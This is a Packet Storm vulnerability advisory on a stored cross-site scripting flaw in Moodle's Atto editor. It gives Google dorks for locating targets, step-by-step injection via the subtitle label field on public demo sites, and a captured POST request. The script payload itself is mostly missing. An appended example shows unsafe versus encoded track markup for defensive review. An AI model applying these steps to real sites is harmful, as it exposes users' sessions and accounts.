Moodle Atto Editor Cross Site Scripting ≈ Packet Storm
# Date: 26.03.2021
# Author: Vincent666 ibn Winnie
# Software Link: https://moodle.org/plugins/editor_atto
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Google Dorks: inurl:/lib/editor/atto/plugins/managefiles/ or calendar/view.php?view=month
# My Youtube Channel: https://www.youtube.com/channel/UCZOWpC2dW9sipPq5z63C2rQ
PoC:
Video PoC: (Update)
https://www.youtube.com/watch?v=vnyo48KImvg
https://www.youtube.com/watch?v=fUWGRqT7lDU
Stored XSS in Atto Editor (default editor)
Use Demo:
https://school.moodledemo.net/
Choose a role: Student (example)
Open calendar:
https://school.moodledemo.net/calendar/view.php?view=month
Create new event:
Example:
Event Title: "Test"
Description: choose Insert Video File and choose Video:
Video Source URL: you can paste a video link from YouTube.
Then open Subtitles and Captions:
Subtitle track URL: use a video link from YouTube.
Field Label: here we can use XSS code:
or try it in base64
Insert Media and save it.
Open the event and get stored XSS.
Or we can use Profile:
https://sandbox.moodledemo.net/user/edit.php?id=4&returnto=profile
The Field Label in the editor is vulnerable to XSS.
We can use XSS and a JS redirect in the profile:
“>
POST:
https://school.moodledemo.net/lib/ajax/service.php?sesskey=vCHlHS7oIl&info=core_calendar_submit_create_update_form
Host: school.moodledemo.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 996
Origin: https://school.moodledemo.net
Connection: keep-alive
Referer: https://school.moodledemo.net/calendar/view.php?view=month
Cookie: MoodleSession=4ea0036558425526decc096ed375b886; EU_COOKIE_LAW_CONSENT=true
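
Added example, not part of the original advisory and not Moodle's own code: the Label field issue described above, shown as a raw-concatenation builder beside an attribute-encoding one. It assumes the label ends up in the label attribute of a <track> element; all function names are hypothetical and the sample input is constructed.

```javascript
// Added example (not Moodle code). Assumption: the editor's "Label" field is
// stored as the label attribute of a <track> element in the saved description.

const ATTR_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode a value for use inside a double-quoted HTML attribute.
function escapeAttr(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ATTR_ESCAPES[ch]);
}

// Accept only absolute http(s) URLs for src; anything else becomes empty.
function safeUrl(value) {
  try {
    const u = new URL(String(value));
    return (u.protocol === 'https:' || u.protocol === 'http:') ? u.href : '';
  } catch (e) {
    return '';
  }
}

// "Before": raw concatenation, so the label can close the attribute and the tag.
function buildTrackUnsafe(t) {
  return '<track src="' + t.src + '" kind="' + t.kind + '" label="' + t.label + '">';
}

// "After": every attribute is validated or encoded before it is emitted.
const KINDS = new Set(['subtitles', 'captions', 'descriptions', 'chapters', 'metadata']);
function buildTrackSafe(t) {
  const kind = KINDS.has(t.kind) ? t.kind : 'subtitles';
  return '<track src="' + escapeAttr(safeUrl(t.src)) + '" kind="' + kind +
         '" label="' + escapeAttr(t.label) + '">';
}

// Count opening tags in a fragment; a single <track> should yield exactly 1.
function countTags(html) {
  return (html.match(/<[a-zA-Z][^>]*>/g) || []).length;
}

// Constructed input: a harmless label that tries to break out of the attribute.
const sample = { src: 'https://example.org/subs.vtt', kind: 'subtitles',
                 label: 'English"><b>injected</b>' };
console.log(countTags(buildTrackUnsafe(sample)), buildTrackUnsafe(sample));
console.log(countTags(buildTrackSafe(sample)), buildTrackSafe(sample));
```

A tag count above 1 for a stored <track> fragment is also a usable review signal when auditing existing event descriptions and profile fields.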